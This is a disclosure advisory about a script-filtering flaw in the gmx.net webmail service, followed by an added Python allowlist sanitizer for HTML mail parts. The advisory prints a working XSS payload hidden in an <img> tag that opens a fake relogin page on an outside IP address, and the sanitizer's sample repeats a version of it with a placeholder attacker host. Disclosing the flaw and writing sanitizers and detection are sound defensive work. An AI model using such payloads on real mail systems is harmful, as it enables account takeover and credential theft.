Vulnerability: gmx.net
Affected: gmx.net

Description:

"rudi carell" found the following.

gmx.net is a European-based free web-mail and web-community system comparable to hotmail.com. Like many other web-mail systems, gmx.net has a problem filtering JavaScript in HTML-based mail messages. This enables an attacker to create HTML messages with malicious JavaScript embedded. The HTML <img> tag can be used to embed malicious JavaScript within HTML mails. Once the "HTML mail part" is opened by the gmx user, it is possible that the "embedded" JavaScript is executed by the web browser (if enabled). This makes it possible to place trojans and execute URL-based webmail commands, leading to a compromise of the user's webmail account.

Sample with "classic" relogin trojan:

    <html><body>
    <img src="javascript: gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHeight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx.focus();">
    <h4>mungo baby</h4></body></html>

.. not very sophisticated but working... changing user options would be more elaborate ..

Solution:

gmx.net displays HTML-based message content in a special security window (called "Volldarstellung" = full display mode) which doesn't contain the session ID of the logged-in user. Therefore it shouldn't be possible to compromise the user's account on our system by such tricks. Anyway, this is fixed now.
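The filtering failure described above is a missing allowlist on URL-bearing attributes. The following is an added example, not code from the advisory or from gmx.net: a sanitizer for HTML mail parts that keeps only allowlisted tags and attributes, rejects any src/href whose scheme is not http, https or mailto (after stripping control characters, which browsers ignore, and after the parser has decoded entity-encoded values), drops every on* handler and removes <script> and similar elements together with their content. The tag allowlist, the function names and the sample message are assumptions; the attacker host in the sample is a placeholder.

```python
import re
from html import escape
from html.parser import HTMLParser

# Allowlist policy: unknown tags are unwrapped (text kept); DROP_WITH_CONTENT tags vanish whole.
ALLOWED_TAGS = {"html", "body", "p", "br", "div", "span", "b", "i", "h4", "ul", "li", "a", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt", "width", "height"}}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
SAFE_SCHEMES = {"http", "https", "mailto"}

def safe_url(value: str) -> bool:
    # Browsers ignore control characters/whitespace inside the scheme ("java\tscript:" is still
    # javascript:), so strip them, then require an explicit allowlisted scheme (relative URLs fail).
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", value)
    m = re.match(r"([a-z][a-z0-9+.-]*):", cleaned, re.I)
    return bool(m) and m.group(1).lower() in SAFE_SCHEMES

class MailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)  # entity-encoded attribute values are decoded first
        self.out, self.dropped, self.skip = [], [], 0  # output, audit trail, drop-nesting depth
    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.skip += 1; self.dropped.append(f"<{tag}> and its content"); return
        if self.skip: return
        if tag not in ALLOWED_TAGS: self.dropped.append(f"<{tag}>"); return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED_ATTRS.get(tag, set()):  # also drops every on* handler
                self.dropped.append(f"{tag}@{name}"); continue
            if name in ("src", "href") and not safe_url(value):
                self.dropped.append(f"{tag}@{name}={value[:40]!r}"); continue
            kept.append(f' {name}="{escape(value)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")
    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT: self.skip = max(0, self.skip - 1)
        elif not self.skip and tag in ALLOWED_TAGS and tag not in ("br", "img"):
            self.out.append(f"</{tag}>")
    def handle_data(self, data):
        if not self.skip: self.out.append(escape(data))

def sanitize(html_mail: str):
    """Return (sanitized_html, removed_items) for one HTML mail part."""
    p = MailSanitizer(); p.feed(html_mail); p.close()
    return "".join(p.out), p.dropped

# Constructed sample modelled on the advisory's message (attacker host is a placeholder).
SAMPLE = ('<html><body><img src="javascript: gmx=window.open(\'http://attacker.example/\')">'
          '<img src="https://mail.example/logo.png" onerror="alert(1)"><h4>mungo baby</h4></body></html>')
```

The removed-items list is worth logging: a burst of rejected javascript: sources or on* attributes across inbound mail is a detection signal for exactly this kind of campaign.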